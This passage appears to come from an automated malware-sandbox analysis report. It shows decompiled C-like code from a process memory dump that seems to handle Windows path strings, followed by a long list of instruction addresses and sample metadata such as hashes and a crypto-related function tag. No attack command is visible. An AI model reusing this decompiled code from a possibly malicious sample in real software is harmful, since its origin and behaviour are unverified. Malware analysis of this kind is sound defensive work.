																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

































































































                                                                                                                                          0x03bf6e30
                                                                                                                                          0x03bf6e35
                                                                                                                                          0x03bf6e37
                                                                                                                                          0x03bf6e3c
                                                                                                                                          0x03bf6e47
                                                                                                                                          0x03bf6e4b
                                                                                                                                          0x03bf6e50
                                                                                                                                          0x03bf6e53
                                                                                                                                          0x03bf6e55
                                                                                                                                          0x03bf6e5b
                                                                                                                                          0x03bf6e5f
                                                                                                                                          0x03bf6e65
                                                                                                                                          0x03bf6e68
                                                                                                                                          0x03bf6e6a
                                                                                                                                          0x03bf6e6d
                                                                                                                                          0x03bf6e70
                                                                                                                                          0x03bf6e73
                                                                                                                                          0x03bf6e76
                                                                                                                                          0x03bf6e79
                                                                                                                                          0x03bf6e7c
                                                                                                                                          0x03bf6e7f
                                                                                                                                          0x03bf6e84
                                                                                                                                          0x03bf710f
                                                                                                                                          0x03bf710f
                                                                                                                                          0x03bf6e8c
                                                                                                                                          0x03bf6e8e
                                                                                                                                          0x03bf6e8e
                                                                                                                                          0x03bf6e97
                                                                                                                                          0x03c3f5d3
                                                                                                                                          0x03c3f5d3
                                                                                                                                          0x03bf6e9d
                                                                                                                                          0x03bf6ea3
                                                                                                                                          0x03bf6eaa
                                                                                                                                          0x03bf6ead
                                                                                                                                          0x03bf6eb2
                                                                                                                                          0x03bf6eb4
                                                                                                                                          0x03bf6eb7
                                                                                                                                          0x03bf7466
                                                                                                                                          0x03bf7466
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf6ebd
                                                                                                                                          0x03bf6ebd
                                                                                                                                          0x03bf6ec4
                                                                                                                                          0x03bf6eca
                                                                                                                                          0x03bf6ecc
                                                                                                                                          0x03bf6ecf
                                                                                                                                          0x03bf6ed2
                                                                                                                                          0x03bf6ede
                                                                                                                                          0x03c3f5df
                                                                                                                                          0x03c3f5e0
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f5e0
                                                                                                                                          0x03bf6ee6
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf6eec
                                                                                                                                          0x03bf6ef3
                                                                                                                                          0x03bf7181
                                                                                                                                          0x03bf6f02
                                                                                                                                          0x03bf6f02
                                                                                                                                          0x03bf6f02
                                                                                                                                          0x03bf6f0b
                                                                                                                                          0x03bf6f0d
                                                                                                                                          0x03bf6f10
                                                                                                                                          0x03bf6f17
                                                                                                                                          0x03bf6f21
                                                                                                                                          0x03bf6f24
                                                                                                                                          0x03bf6f2d
                                                                                                                                          0x03bf6f31
                                                                                                                                          0x03bf6f36
                                                                                                                                          0x03bf6f3d
                                                                                                                                          0x03bf7413
                                                                                                                                          0x03bf7416
                                                                                                                                          0x03bf7419
                                                                                                                                          0x03bf741c
                                                                                                                                          0x03bf7421
                                                                                                                                          0x03bf742b
                                                                                                                                          0x03bf742b
                                                                                                                                          0x03bf742e
                                                                                                                                          0x03bf7439
                                                                                                                                          0x03c3f60b
                                                                                                                                          0x03c3f60b
                                                                                                                                          0x03c3f615
                                                                                                                                          0x03c3f619
                                                                                                                                          0x03bf743f
                                                                                                                                          0x03bf7447
                                                                                                                                          0x03bf7454
                                                                                                                                          0x03bf745a
                                                                                                                                          0x03bf745f
                                                                                                                                          0x03bf745f
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7439
                                                                                                                                          0x03bf7425
                                                                                                                                          0x03c3f5e9
                                                                                                                                          0x03c3f5ed
                                                                                                                                          0x03c3f5f4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f5fd
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f603
                                                                                                                                          0x03c3f603
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf6f43
                                                                                                                                          0x03bf6f43
                                                                                                                                          0x03bf6f45
                                                                                                                                          0x03bf6f48
                                                                                                                                          0x03bf6f4e
                                                                                                                                          0x03bf6f65
                                                                                                                                          0x03bf6f68
                                                                                                                                          0x03bf721f
                                                                                                                                          0x03bf6f83
                                                                                                                                          0x03bf6f86
                                                                                                                                          0x03bf72dc
                                                                                                                                          0x03bf72dc
                                                                                                                                          0x03bf6f9e
                                                                                                                                          0x03bf6fa1
                                                                                                                                          0x03bf6fa3
                                                                                                                                          0x03bf6fa5
                                                                                                                                          0x03bf6fa8
                                                                                                                                          0x03bf6fab
                                                                                                                                          0x03bf6fae
                                                                                                                                          0x03bf6fb1
                                                                                                                                          0x03bf6fb4
                                                                                                                                          0x03bf6fb6
                                                                                                                                          0x03bf6fb9
                                                                                                                                          0x03bf6fbf
                                                                                                                                          0x03bf718a
                                                                                                                                          0x03bf718e
                                                                                                                                          0x03c3f831
                                                                                                                                          0x03c3f831
                                                                                                                                          0x03c3f833
                                                                                                                                          0x03c3f836
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f836
                                                                                                                                          0x03bf7194
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f658
                                                                                                                                          0x03c3f658
                                                                                                                                          0x03c3f65a
                                                                                                                                          0x03c3f65d
                                                                                                                                          0x03c3f662
                                                                                                                                          0x03c3f662
                                                                                                                                          0x03c3f665
                                                                                                                                          0x03c3f667
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f669
                                                                                                                                          0x03c3f66c
                                                                                                                                          0x03c3f670
                                                                                                                                          0x03c3f673
                                                                                                                                          0x03c3f67a
                                                                                                                                          0x03c3f67a
                                                                                                                                          0x03c3f67b
                                                                                                                                          0x03c3f67e
                                                                                                                                          0x03c3f681
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f683
                                                                                                                                          0x03c3f683
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f683
                                                                                                                                          0x03c3f675
                                                                                                                                          0x03c3f678
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f678
                                                                                                                                          0x03c3f686
                                                                                                                                          0x03c3f688
                                                                                                                                          0x03c3f68b
                                                                                                                                          0x03c3f68e
                                                                                                                                          0x03c3f691
                                                                                                                                          0x03c3f694
                                                                                                                                          0x03c3f698
                                                                                                                                          0x03c3f69c
                                                                                                                                          0x03c3f6a0
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7397
                                                                                                                                          0x03bf739c
                                                                                                                                          0x03bf739f
                                                                                                                                          0x03bf73a3
                                                                                                                                          0x03bf73a5
                                                                                                                                          0x03c3f6bb
                                                                                                                                          0x03c3f6c1
                                                                                                                                          0x03c3f6c4
                                                                                                                                          0x03bf73ab
                                                                                                                                          0x03bf73ab
                                                                                                                                          0x03bf73ab
                                                                                                                                          0x03bf73b1
                                                                                                                                          0x03bf73b5
                                                                                                                                          0x03bf73ba
                                                                                                                                          0x03bf73c0
                                                                                                                                          0x03bf73c3
                                                                                                                                          0x03bf73c7
                                                                                                                                          0x03bf73cc
                                                                                                                                          0x03bf73d0
                                                                                                                                          0x03bf73d3
                                                                                                                                          0x03c3f6cc
                                                                                                                                          0x03c3f6d4
                                                                                                                                          0x03c3f6d9
                                                                                                                                          0x03c3f6dd
                                                                                                                                          0x03c3f6e1
                                                                                                                                          0x03c3f6e5
                                                                                                                                          0x03c3f6f0
                                                                                                                                          0x03c3f6fc
                                                                                                                                          0x03c3f700
                                                                                                                                          0x03c3f709
                                                                                                                                          0x03c3f70e
                                                                                                                                          0x03c3f710
                                                                                                                                          0x03c3f784
                                                                                                                                          0x03c3f788
                                                                                                                                          0x03c3f78b
                                                                                                                                          0x03c3f78e
                                                                                                                                          0x03c3f790
                                                                                                                                          0x03c3f792
                                                                                                                                          0x03c3f795
                                                                                                                                          0x03c3f798
                                                                                                                                          0x03c3f7b7
                                                                                                                                          0x03c3f7b7
                                                                                                                                          0x03c3f7ba
                                                                                                                                          0x03c3f7ba
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f7ba
                                                                                                                                          0x03c3f79a
                                                                                                                                          0x03c3f79d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f79f
                                                                                                                                          0x03c3f7a4
                                                                                                                                          0x03c3f7a7
                                                                                                                                          0x03c3f7ab
                                                                                                                                          0x03c3f7ae
                                                                                                                                          0x03c3f7b1
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f7b1
                                                                                                                                          0x03c3f712
                                                                                                                                          0x03c3f717
                                                                                                                                          0x03c3f74c
                                                                                                                                          0x03c3f74e
                                                                                                                                          0x03c3f752
                                                                                                                                          0x03c3f756
                                                                                                                                          0x03c3f75d
                                                                                                                                          0x03c3f761
                                                                                                                                          0x03c3f764
                                                                                                                                          0x03c3f76c
                                                                                                                                          0x03c3f771
                                                                                                                                          0x03c3f775
                                                                                                                                          0x03c3f778
                                                                                                                                          0x03c3f77c
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f77c
                                                                                                                                          0x03c3f719
                                                                                                                                          0x03c3f71d
                                                                                                                                          0x03c3f720
                                                                                                                                          0x03c3f723
                                                                                                                                          0x03c3f726
                                                                                                                                          0x03c3f729
                                                                                                                                          0x03c3f72e
                                                                                                                                          0x03c3f740
                                                                                                                                          0x03c3f744
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f744
                                                                                                                                          0x03c3f730
                                                                                                                                          0x03c3f732
                                                                                                                                          0x03c3f735
                                                                                                                                          0x03c3f738
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf73d9
                                                                                                                                          0x03bf73d9
                                                                                                                                          0x03bf73db
                                                                                                                                          0x03bf73de
                                                                                                                                          0x03bf73e1
                                                                                                                                          0x03bf73e4
                                                                                                                                          0x03bf73e7
                                                                                                                                          0x03bf73ea
                                                                                                                                          0x03bf73ef
                                                                                                                                          0x03bf73f2
                                                                                                                                          0x03bf73f6
                                                                                                                                          0x03bf73f9
                                                                                                                                          0x03bf73f9
                                                                                                                                          0x03bf73fe
                                                                                                                                          0x03bf7401
                                                                                                                                          0x03bf7406
                                                                                                                                          0x03bf7409
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7409
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f7c5
                                                                                                                                          0x03c3f7ca
                                                                                                                                          0x03c3f7cd
                                                                                                                                          0x03c3f7d1
                                                                                                                                          0x03c3f7d3
                                                                                                                                          0x03c3f7da
                                                                                                                                          0x03c3f7e0
                                                                                                                                          0x03c3f7e3
                                                                                                                                          0x03c3f7e3
                                                                                                                                          0x03c3f7e6
                                                                                                                                          0x03c3f7d5
                                                                                                                                          0x03c3f7d5
                                                                                                                                          0x03c3f7d5
                                                                                                                                          0x03c3f7e9
                                                                                                                                          0x03c3f7eb
                                                                                                                                          0x03c3f7f0
                                                                                                                                          0x03c3f7f3
                                                                                                                                          0x03c3f7f5
                                                                                                                                          0x03c3f7f8
                                                                                                                                          0x03c3f7fb
                                                                                                                                          0x03c3f7fe
                                                                                                                                          0x03c3f801
                                                                                                                                          0x03c3f80f
                                                                                                                                          0x03c3f814
                                                                                                                                          0x03c3f803
                                                                                                                                          0x03c3f803
                                                                                                                                          0x03c3f806
                                                                                                                                          0x03c3f806
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf719d
                                                                                                                                          0x03bf71a2
                                                                                                                                          0x03bf71a5
                                                                                                                                          0x03bf71a9
                                                                                                                                          0x03bf71ab
                                                                                                                                          0x03c3f826
                                                                                                                                          0x03c3f829
                                                                                                                                          0x03bf71b1
                                                                                                                                          0x03bf71b1
                                                                                                                                          0x03bf71ba
                                                                                                                                          0x03bf71ba
                                                                                                                                          0x03bf71bf
                                                                                                                                          0x03bf71c5
                                                                                                                                          0x03bf71cf
                                                                                                                                          0x03bf71d2
                                                                                                                                          0x03bf71d8
                                                                                                                                          0x03bf71dd
                                                                                                                                          0x03bf71e4
                                                                                                                                          0x03bf71e7
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7275
                                                                                                                                          0x03bf727a
                                                                                                                                          0x03bf727d
                                                                                                                                          0x03bf727f
                                                                                                                                          0x03bf7282
                                                                                                                                          0x03bf7284
                                                                                                                                          0x03c3f6a8
                                                                                                                                          0x03c3f6aa
                                                                                                                                          0x03c3f6aa
                                                                                                                                          0x03bf728a
                                                                                                                                          0x03bf728f
                                                                                                                                          0x03bf7292
                                                                                                                                          0x03bf7297
                                                                                                                                          0x03bf729a
                                                                                                                                          0x03bf729d
                                                                                                                                          0x03bf72a0
                                                                                                                                          0x03bf72a5
                                                                                                                                          0x03bf72a9
                                                                                                                                          0x03bf72ac
                                                                                                                                          0x03bf72af
                                                                                                                                          0x03bf72b2
                                                                                                                                          0x03bf72b5
                                                                                                                                          0x03bf72b7
                                                                                                                                          0x03bf72ba
                                                                                                                                          0x03bf72be
                                                                                                                                          0x03bf72be
                                                                                                                                          0x03bf72c2
                                                                                                                                          0x03bf72c5
                                                                                                                                          0x03bf72c8
                                                                                                                                          0x03c3f6b2
                                                                                                                                          0x03c3f6b2
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf6fc5
                                                                                                                                          0x03bf6fc5
                                                                                                                                          0x03bf6fcc
                                                                                                                                          0x03bf6fd8
                                                                                                                                          0x03bf6fda
                                                                                                                                          0x03bf6fdd
                                                                                                                                          0x03bf6fe3
                                                                                                                                          0x03bf7162
                                                                                                                                          0x03c3f845
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f84e
                                                                                                                                          0x03c3f8c4
                                                                                                                                          0x03c3f8c8
                                                                                                                                          0x03c3f8cb
                                                                                                                                          0x03c3f8ce
                                                                                                                                          0x03bf70e0
                                                                                                                                          0x03bf70e0
                                                                                                                                          0x03bf70e3
                                                                                                                                          0x03bf70e3
                                                                                                                                          0x03bf70ea
                                                                                                                                          0x03bf70ef
                                                                                                                                          0x03bf70f1
                                                                                                                                          0x03bf70f4
                                                                                                                                          0x03bf70fc
                                                                                                                                          0x03bf70fd
                                                                                                                                          0x03bf70fe
                                                                                                                                          0x03bf710c
                                                                                                                                          0x03bf710c
                                                                                                                                          0x03c3f850
                                                                                                                                          0x03c3f858
                                                                                                                                          0x03c3f87a
                                                                                                                                          0x03c3f88a
                                                                                                                                          0x03c3f88d
                                                                                                                                          0x03c3f890
                                                                                                                                          0x03c3f893
                                                                                                                                          0x03c3f895
                                                                                                                                          0x03c3f898
                                                                                                                                          0x03c3f8a4
                                                                                                                                          0x03c3f8ad
                                                                                                                                          0x03c3f8b0
                                                                                                                                          0x03c3f8b3
                                                                                                                                          0x03c3f8b3
                                                                                                                                          0x03c3f8a4
                                                                                                                                          0x03bf6fec
                                                                                                                                          0x03bf6fec
                                                                                                                                          0x03bf6fee
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf6ff1
                                                                                                                                          0x03bf6ff8
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf6ffe
                                                                                                                                          0x03bf7004
                                                                                                                                          0x03bf7006
                                                                                                                                          0x03bf7006
                                                                                                                                          0x03bf7010
                                                                                                                                          0x03bf7017
                                                                                                                                          0x03bf701e
                                                                                                                                          0x03bf7072
                                                                                                                                          0x03bf7074
                                                                                                                                          0x03bf707e
                                                                                                                                          0x03bf7083
                                                                                                                                          0x03bf7087
                                                                                                                                          0x03bf7088
                                                                                                                                          0x03bf706c
                                                                                                                                          0x03bf706c
                                                                                                                                          0x03bf706d
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf706d
                                                                                                                                          0x03bf707c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf707c
                                                                                                                                          0x03bf7020
                                                                                                                                          0x03bf7023
                                                                                                                                          0x03bf71ef
                                                                                                                                          0x03bf71ef
                                                                                                                                          0x03bf71f2
                                                                                                                                          0x03bf71f7
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf71fd
                                                                                                                                          0x03bf7200
                                                                                                                                          0x03bf7205
                                                                                                                                          0x03bf720b
                                                                                                                                          0x03bf720e
                                                                                                                                          0x03bf72eb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf72f6
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7030
                                                                                                                                          0x03bf7037
                                                                                                                                          0x03bf703e
                                                                                                                                          0x03bf7055
                                                                                                                                          0x03bf705a
                                                                                                                                          0x03bf7062
                                                                                                                                          0x03c3f908
                                                                                                                                          0x03c3f90e
                                                                                                                                          0x03c3f90f
                                                                                                                                          0x03c3f90f
                                                                                                                                          0x03c3f908
                                                                                                                                          0x03bf7062
                                                                                                                                          0x03bf705a
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7045
                                                                                                                                          0x03bf7045
                                                                                                                                          0x03bf7049
                                                                                                                                          0x03bf704a
                                                                                                                                          0x03bf704d
                                                                                                                                          0x03bf704e
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf704e
                                                                                                                                          0x03bf703e
                                                                                                                                          0x03bf7068
                                                                                                                                          0x03bf7069
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7069
                                                                                                                                          0x03bf72fc
                                                                                                                                          0x03bf7301
                                                                                                                                          0x03bf7304
                                                                                                                                          0x03bf7314
                                                                                                                                          0x03bf7314
                                                                                                                                          0x03bf7319
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7325
                                                                                                                                          0x03bf732d
                                                                                                                                          0x03bf7330
                                                                                                                                          0x03bf7356
                                                                                                                                          0x03bf7357
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7332
                                                                                                                                          0x03bf7332
                                                                                                                                          0x03bf7337
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7343
                                                                                                                                          0x03bf734b
                                                                                                                                          0x03bf734e
                                                                                                                                          0x03bf7361
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7367
                                                                                                                                          0x03bf7367
                                                                                                                                          0x03bf7368
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7368
                                                                                                                                          0x03bf7350
                                                                                                                                          0x03bf7351
                                                                                                                                          0x03bf7351
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7332
                                                                                                                                          0x03c3f8f9
                                                                                                                                          0x03c3f8f9
                                                                                                                                          0x03c3f8fa
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f8fa
                                                                                                                                          0x03bf7306
                                                                                                                                          0x03bf730e
                                                                                                                                          0x03c3f8ee
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f8f4
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf730e
                                                                                                                                          0x03bf7214
                                                                                                                                          0x03bf7214
                                                                                                                                          0x03bf7217
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7217
                                                                                                                                          0x03bf702c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf702c
                                                                                                                                          0x03bf708d
                                                                                                                                          0x03bf7094
                                                                                                                                          0x03bf7098
                                                                                                                                          0x03bf70a0
                                                                                                                                          0x03bf738c
                                                                                                                                          0x03bf738d
                                                                                                                                          0x03bf738d
                                                                                                                                          0x03bf70a0
                                                                                                                                          0x03bf7098
                                                                                                                                          0x03bf70a6
                                                                                                                                          0x03bf70ab
                                                                                                                                          0x03bf70b3
                                                                                                                                          0x03bf70b5
                                                                                                                                          0x03bf70cd
                                                                                                                                          0x03bf70cd
                                                                                                                                          0x03bf70d0
                                                                                                                                          0x03bf70d8
                                                                                                                                          0x03bf711a
                                                                                                                                          0x03bf711c
                                                                                                                                          0x03bf711c
                                                                                                                                          0x03bf7121
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7129
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf712b
                                                                                                                                          0x03bf712b
                                                                                                                                          0x03bf7130
                                                                                                                                          0x03bf737e
                                                                                                                                          0x03bf7381
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7381
                                                                                                                                          0x03bf7138
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7144
                                                                                                                                          0x03bf7144
                                                                                                                                          0x03bf70da
                                                                                                                                          0x03bf70da
                                                                                                                                          0x03bf70dd
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf70dd
                                                                                                                                          0x03bf70b7
                                                                                                                                          0x03bf70b8
                                                                                                                                          0x03bf70bb
                                                                                                                                          0x03bf70c2
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf70c7
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf70c9
                                                                                                                                          0x03bf70ca
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf70ad
                                                                                                                                          0x03bf70ad
                                                                                                                                          0x03bf70af
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf70af
                                                                                                                                          0x03bf7148
                                                                                                                                          0x03bf714d
                                                                                                                                          0x03c3f8e2
                                                                                                                                          0x03c3f8e2
                                                                                                                                          0x03bf7153
                                                                                                                                          0x03bf7154
                                                                                                                                          0x03bf7157
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7157
                                                                                                                                          0x03c3f87c
                                                                                                                                          0x03c3f87f
                                                                                                                                          0x03c3f882
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f882
                                                                                                                                          0x03c3f85e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f864
                                                                                                                                          0x03c3f869
                                                                                                                                          0x03c3f86c
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f86c
                                                                                                                                          0x03bf7168
                                                                                                                                          0x03bf7170
                                                                                                                                          0x03c3f8d6
                                                                                                                                          0x03c3f8d6
                                                                                                                                          0x03bf7176
                                                                                                                                          0x03bf7179
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7179
                                                                                                                                          0x03bf6fe9
                                                                                                                                          0x03bf6fe9
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf6fe9
                                                                                                                                          0x03bf6fbf
                                                                                                                                          0x03bf6f8c
                                                                                                                                          0x03bf6f93
                                                                                                                                          0x03bf72d6
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf72d6
                                                                                                                                          0x03bf6f99
                                                                                                                                          0x03bf6f99
                                                                                                                                          0x03bf6f99
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf6f68
                                                                                                                                          0x03bf6f50
                                                                                                                                          0x03bf6f56
                                                                                                                                          0x03bf722c
                                                                                                                                          0x03c3f629
                                                                                                                                          0x03c3f629
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f629
                                                                                                                                          0x03bf7232
                                                                                                                                          0x03bf7239
                                                                                                                                          0x03c3f623
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f623
                                                                                                                                          0x03bf723f
                                                                                                                                          0x03bf7242
                                                                                                                                          0x03c3f64e
                                                                                                                                          0x03c3f64e
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f64e
                                                                                                                                          0x03bf7248
                                                                                                                                          0x03bf724f
                                                                                                                                          0x03bf7373
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf7379
                                                                                                                                          0x03bf7255
                                                                                                                                          0x03bf7258
                                                                                                                                          0x03c3f63c
                                                                                                                                          0x03c3f648
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f648
                                                                                                                                          0x03bf725e
                                                                                                                                          0x03bf7265
                                                                                                                                          0x03c3f636
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3f636
                                                                                                                                          0x03bf726b
                                                                                                                                          0x03bf726b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf6f56
                                                                                                                                          0x03bf6f3d
                                                                                                                                          0x03bf6ed2
                                                                                                                                          0x00000000
                                                                                                                                          0x03bf6ec4

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f8aac720baf2d6a2ce861041c09b6d1b0047ecae2f9c48e4765a9f24cdad420c
                                                                                                                                          • Instruction ID: 9815e0f768d2b6447d873e785330ecb93d3d9388bc86ac94d7e9143c65d02df6
                                                                                                                                          • Opcode Fuzzy Hash: f8aac720baf2d6a2ce861041c09b6d1b0047ecae2f9c48e4765a9f24cdad420c
                                                                                                                                          • Instruction Fuzzy Hash: 9A02AF71D102158FCB28CFA8C481AADF7B1EF45748F2950FEE916EB250EB709999CB40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BF4120 Relevance: .4, Instructions: 444COMMONCrypto
